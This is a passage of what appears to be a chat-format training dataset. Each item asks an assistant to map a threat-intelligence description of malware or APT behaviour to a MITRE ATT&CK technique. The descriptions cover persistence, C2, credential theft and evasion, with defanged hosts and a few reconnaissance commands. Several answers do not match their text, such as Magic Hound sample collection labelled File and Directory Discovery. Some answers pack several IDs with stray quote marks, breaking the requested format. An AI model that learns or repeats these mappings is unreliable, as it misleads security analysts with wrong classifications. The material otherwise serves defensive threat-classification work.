"role": "user", "content": "Dragonfly 2.0 created accounts on victims, including administrator accounts, some of which appeared to be tailored to each individual staging target." }, { "role": "assistant", "content": "T1136.001 - Create Account: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In one sample we analyzed, the zip file contains a VBS file named NUM_56960.vbs. The size of the file is around 30MB. The large file size helps it evade detection, as file scanners usually skip scanning huge files for performance reasons. This VBS file then downloads the malicious executable file PaintHelper.exe" }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TSCookie has the ability to list processes on the infected host." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can encrypt and pack malicious payloads." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses cmd.exe to run commands for enumerating the host." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The function of this tool is to set up a TCP listener on a localhost, receive encoded data via requests from the SodomNormal localhost module, and to forward this data to the command and control IP via HTTP. The GUP Proxy Tool has a hardcoded configuration which is included as both strings and integers" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Keydnap prompts the users for credentials." }, { "role": "assistant", "content": "T1056.002 - Input Capture: GUI Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InnaputRAT gathers volume drive information and system information." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MCMD can use HTTPS in communication with C2 web servers." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The macro then creates a scheduled task named SecurityAssist that runs after waiting one minute. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "leverages valid accounts after gaining credentials for use within the victim domain." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLUELIGHT has collected the computer name and OS version from victim machines." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has used SSH to connect back to victim machines. TeamTNT has also used SSH to transfer tools and payloads onto victim hosts and execute them." }, { "role": "assistant", "content": "T1021.004 - Remote Services: SSH" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has used VMProtect to pack and protect files." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Volgmer checks the system for certain Registry keys." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We were able to collect over fifty samples of the tools used by the Magic Hound campaign using the AutoFocus threat intelligence tool. The earliest malware sample we were able to collect had a compile timestamp in May 2016. The samples themselves ranged from IRC bots, an open source Python remote access tool, malicious macros, and others" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Installs UnionCryptoTrader in folder /Applications/UnionCryptoTrader.app/Contents/MacOS/ - Installs .unioncryptoupdater in folder /Applications/UnionCryptoTrader.app/Contents/Resources/ Note: the leading “.” makes it unlisted in the Finder app or default Terminal directory listing - Note: the leading “.” makes it unlisted in the Finder app or default Terminal directory listing - Executes a postinstall script Moves .vip.unioncrypto.plist to folder LaunchDaemons Changes the file permissions on the plist to Root Runs unioncryptoupdater Moves .unioncryptoupdater to folder /Library/UnionCrypto/unioncryptoupdater Makes .unioncryptoupdater executable - Moves .vip.unioncrypto.plist to folder LaunchDaemons - Changes the file permissions on the plist to Root - Runs unioncryptoupdater - Moves .unioncryptoupdater to folder /Library/UnionCrypto/unioncryptoupdater - Makes .unioncryptoupdater executable" }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The VBScript in turn runs rundll32.exe, activating the Cobalt Strike DLL (step #5) using a clean parent/child process tree completely disconnected from the SolarWinds process. Finally, the VBScript removes the previously created IFEO value to clean up any traces of execution (step #6) and also deletes the following registry keys related to HTTP proxy" }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host', 'T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ccf32 has created a hidden directory on targeted systems, naming it after the current local time (year, month, and day)." }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PipeMon is a modular backdoor where each module is a single DLL exporting a function called IntelLoader and is loaded using a reflective loading technique. Each module exhibits different functionalities that are shown in Table 2" }, { "role": "assistant", "content": "T1129 - Server Software Component" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FruitFly executes and stores obfuscated Perl scripts." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT33 has used HTTP over TCP ports 808 and 880 for command and control." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Felismus can download files from remote servers." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. TermsHost.exe\" is a PE32 Monero miner. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"Windows processes to bypass firewalls. The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample also creates the UPX-packed file \"dDNLQrsBUE.url\" in the Windows Start Menu Folder. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system" }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This dynamic link library appears to be a legitimate version of libcurl.dll except for a single exported function, which is referred to as ordinal #52 and curl_share_init in the analyzed sample. This function has been modified by threat actors to extract a resource contained within libcurl.dll, decrypt malicious data included in that resource, and load the resulting DLL to execute a malicious function. When this function is executed, the SodomNormal communications module begins running within Libcurl.dll" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Systeminfo can be used to gather information about the operating system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can establish persistence by adding a Scheduled Task named \"Microsoft Boost Kernel Optimization\"." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Windows Defender ATP displays these activities as process trees in a machine timeline for the infected computer. Analysts can easily extract detailed information from these trees, such as the implant DLL dropped by the installer, the command used to call rundll32.exe and load the DLL, and the registry modifications that set the DLL as a service" }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Proton kills security tools like Wireshark that are running." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Epic uses the \"tasklist /v\" command to obtain a list of processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ESET researchers have dissected some of the latest additions to the malicious toolkit of the Advanced Persistent Threat (APT) group known as OceanLotus, also dubbed APT32 and APT-C-00" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Explosive has collected the MAC address from the victim's machine." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NanHaiShu collects the username from the victim." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lokibot is delivered via a malicious XLS attachment contained within a spearhpishing email." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Prior to executing fully, Karagany uses a robust anti-VM detection function that can detect most commonly used virtualization platforms such as VMWare, VirtualBox, VPC, and generic virtualization techniques. Only the VMWare and VirtualBox checks retained, mainly based on loaded drivers and file paths. This change dramatically reduced the file size of the malware" }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Crimson contains a command to collect the victim MAC address and LAN IP." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ADVSTORESHELL collects, compresses, encrypts, and exfiltrates data to the C2 server every 10 minutes." }, { "role": "assistant", "content": "T1029 - Scheduled Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER uses the command-line interface." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN8 has used malicious e-mail attachments to lure victims into executing malware." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We found a Coinminer bundled with the legitimate installer of video conferencing app Zoom, luring users who want to install the software but end up unwittingly downloading a malicious file. The compromised files are not from Zoom’s official download center, and are assumed to come from fraudulent websites. We have been working with Zoom to ensure that they are able to communicate this to their users appropriately." }, { "role": "assistant", "content": "T1588.001 - Malware', 'T1554 - Compromise Host Software Binary', 'T1195.002 - Compromise Software Supply Chain', 'T1574.005 - Executable Installer File Permissions Weakness" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "sends emails to victims with a malicious executable disguised as a document or spreadsheet displaying a fake icon." }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After setting up persistent access, the payload checks to see if a value exists within a registry key in the HKCU hive whose name is the same as the scheduled task (ex. This registry key is empty upon the first execution of the payload. This exception invokes the exception handler containing the HTTP communication code, allowing it to run. If either attempt is successful, the C2 server will respond with the session ID and a pre-shared key in cleartext, which it will save to the previously mentioned registry key. The C2 server will provide the pre-shared key within the response data and will provide the session ID value via the Set-Cookie field within the response, specifically the string after the PHPSESSID parameter of the cookie. If both attempts fail and the payload is unable to obtain a session ID and pre-shared key via HTTP or HTTPS, it will try to use DNS tunneling. To obtain the session ID and pre-shared key, the payload will issue a query to resolve the following domain: mail" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tropic Trooper has injected a DLL backdoor into dllhost.exe and svchost.exe." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gh0st RAT has encrypted TCP communications to evade detection." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole can scan the network for open ports and vulnerable instances of RDP and SMB protocols." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PipeMon can attempt to gain administrative privileges using token impersonation." }, { "role": "assistant", "content": "T1134.002 - Create Process with Token" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShimRatReporter encrypted gathered information with a combination of shifting and XOR using a static key." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The companies believe that the actors acquired legitimate credentials prior to the cyber-attack to facilitate remote access" }, { "role": "assistant", "content": "T1078 - Valid Accounts', 'T1219 - Remote Access Software" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fgdump can dump Windows password hashes." }, { "role": "assistant", "content": "T1003.002 - OS Credential Dumping: Security Account Manager" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emotet can brute force a local admin password, then use it to facilitate lateral movement." }, { "role": "assistant", "content": "T1078.003 - Valid Accounts: Local Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Molerats has used forged Microsoft code-signing certificates on malware." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PS1 is distributed as a set of encrypted files and scripts." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ThiefQuest encrypts a set of file extensions on a host, deletes the original files, and provides a ransom note with no contact information." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "version of adds a registry key to HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run for persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) — This simple downloader's code is similar to the main xxmm payload. MSGet — This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. MSGet typically downloads encoded binaries from hard-coded URLs. DGet — This simple downloader (see Figure 4) is similar to the wget web server retrieval tool. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Mimikatz credential dumper has been extended to include Skeleton Key domain controller authentication bypass functionality. The \"LSADUMP::ChangeNTLM\" and \"LSADUMP::SetNTLM\" modules can also manipulate the password hash of an account without knowing the clear text value." }, { "role": "assistant", "content": "T1098 - Account Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Matryoshka is capable of performing screen captures." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Taidoor can copy cmd.exe into the system temp folder." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Motherboard Check The Trojan will perform the following WMI query:   Select * from Win32_BaseBoard   The Trojan will check the Manufacturer and Product fields in the results for the strings VMware, Virtual, VBox, VM or Oracle" }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks', 'T1497 - Virtualization/Sandbox Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "While operating in the victim’s internal network, the threat actor accessed sensitive information specific to the products and services that the victim organization provided. This information included items such as product/service architecture and design documents, vulnerabilities and step-by-step instructions to perform various tasks. Additionally, the threat actor viewed pages related to internal business operations such as development schedules and points of contact" }, { "role": "assistant", "content": "T1213 - Data from Information Repositories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It writes a file using two data structures: one associated with the file and other used for reading data from the C&C" }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has exfiltrated data over its C2 channel." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BackConfig has the ability to use hidden columns in Excel spreadsheets to store executable files or commands for VBA macros." }, { "role": "assistant", "content": "T1137.001 - Office Application Startup: Office Template Macros." } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KEYMARBLE gathers the MAC address of the victim’s machine." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Neoichor can download additional files onto a compromised host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Diavol will terminate services using the Service Control Manager (SCM) API." }, { "role": "assistant", "content": "T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ISMInjector hollows out a newly created process RegASM.exe and injects its payload into the hollowed process." }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As seen below, the relational analysis proved to be quite fruitful: Figure 1 Overview of relationships We rapidly discovered a different set of tools communicating to the exact same C2 servers as those two Word documents, in addition to other tools communicating to other subdomain variations of chrome-up[.]date as seen in the following graphic: Figure 2 Command and control overlaps From there, we were able to map out a large infrastructure separating out into four categories of tools: downloaders, droppers, loaders, and payloads" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "38, the credentials are retrieved from the logins.json file and the browser history is retrieved from the places.sqlite database" }, { "role": "assistant", "content": "T1217 - Browser Bookmark Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used reg query “HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default” on a victim to query the Registry." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to download files from the C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Javali can capture login credentials from open browsers including Firefox, Chrome, Internet Explorer, and Edge." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "this is a late-stage kill chain attack that allows a threat actor with admin (domain or enterprise admin) credentials to leverage the replication mechanism in AD to register a rogue domain controller in order to inject backdoor changes to an AD domain. With that rogue DC, the attacker can manipulate AD data, including objects, and schemas." }, { "role": "assistant", "content": "T1207 - Rogue Domain Controller" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the ability to identify any anti-virus installed on the infected system." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM can obtain a list of smart card readers attached to the victim." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NotPetya searches for files ending with dozens of different file extensions prior to encryption." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To obtain the session ID and pre-shared key, the payload will issue a query to resolve the following domain: mail. random number between 100000 and 999999>.<c2 name> This request notifies the C2 server that the payload is about to send system specific data as part of the initial handshake" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, 